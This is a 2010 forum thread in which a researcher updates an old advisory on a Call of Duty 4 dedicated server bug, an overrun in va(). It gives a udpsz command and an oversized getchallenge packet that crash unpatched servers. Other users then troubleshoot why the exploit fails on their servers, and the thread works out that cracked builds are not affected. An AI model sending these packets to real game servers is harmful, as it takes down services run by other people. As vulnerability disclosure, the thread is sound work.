cod4 Attempted to overrun string in call to va()

aluigi · **Posted:** 07 Jul 2010 08:53

just an update to the advisory I released 2 years ago.
indeed for exploiting this bug is not needed to join the server, it's enough a getchallenge packet with a long hash like the following example:

yyyygetchallenge 0 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...1024...aaa

so:

Code:

udpsz -C ffffffff6765746368616c6c656e6765203020 -b A SERVER PORT 2000

obviously if the server uses my cod4vawo.lpatch work-around it's immune.
for the additional info about the bug I remember my advisory:
http://aluigi.org/adv/cod4vamap-adv.txt

Erco21 · **Posted:** 07 Jul 2010 13:07

I tried this, both from ingame, and with udpsz, but the bug simply doesnt work, and my server doesnt have that lpatch
it's cod4 1.7 (i guess that's the version it's supposed to work on)
i think i did all that it's supposed to be done to activate the exploit...

aluigi · **Posted:** 07 Jul 2010 15:51

have you launched the server as internet server?

I forgot to say it (and I must still upload the updated advisory), but that part of the getchallenge packet involved in the bug doesn't work on LAN server.
so remember to start the server with +set dedicated 2

Erco21 · **Posted:** 07 Jul 2010 18:54

well, i tested it on server that i have for testing all stuff, and which is online all time (so it's dedicated)

i even tried from ingame, using callvote, and even when the vote passes, nothing happens
and my server doesnt have the patch

aluigi · **Posted:** 07 Jul 2010 20:19

maybe you have a magic server :)

Erco21 · **Posted:** 07 Jul 2010 20:46

haha, maybe i do :P

tho, i asked a friend to test this out on his server too, and it came out with same result: nothing happened (didnt chec callvote, but that wasnt my goal anyways)
so im pretty convinced that this is patched somehow
btw. my friends server is cod5, not cod4

aluigi · **Posted:** 07 Jul 2010 21:16

indeed cod5 is not vulnerable.
the "va overrun" bug and particularly that getchallenge way works only on cod4 in internet mode

Erco21 · **Posted:** 07 Jul 2010 21:44

hmm, well, if my server isnt vulnreable, then i dont really care if the exploit actually works or not :D

Henk · **Joined:** 27 May 2010 19:08 **Posts:** 23

I got the same. It doesn't work.
It is a CoD 4 Dedicated 2 server. Voting is disabled. Or should voting be enabled?

I removed my server IP and replaced it with 00.
http://i27.tinypic.com/dbh66x.jpg

aluigivacancy · **Posted:** 08 Jul 2010 16:57

are you sure that server doesn't have my patches applied?
are you sure it is NOT a cracked server?
because that part with the aaaaaaa is an hash that the client sends to the server so that it checks it remotely with the cod4 auth server and then allows or rejects the client (needcdkey).

in any case the tests must be performed with a clean server so:
- install cod4
- patch with 1.07
- start the server with +set dedicated 2
- test it

Erco21 · **Posted:** 08 Jul 2010 17:14

now i know what was the problem- cracked server
either i didnt notice that you wrote that as a condition for bug to work, or you really didnt write that :P

anyways, i'l try to test it on non cracked and il post with what i turn out

aluigivacancy · **Posted:** 08 Jul 2010 17:23

I didn't write it because everytime I refer ever to the default installation without external customizations

Henk · **Joined:** 27 May 2010 19:08 **Posts:** 23

Yea it was cracked.
Sorry for my failing @ reading.

I will try it again.

Thanxs :)

Luigi Auriemma

cod4 Attempted to overrun string in call to va()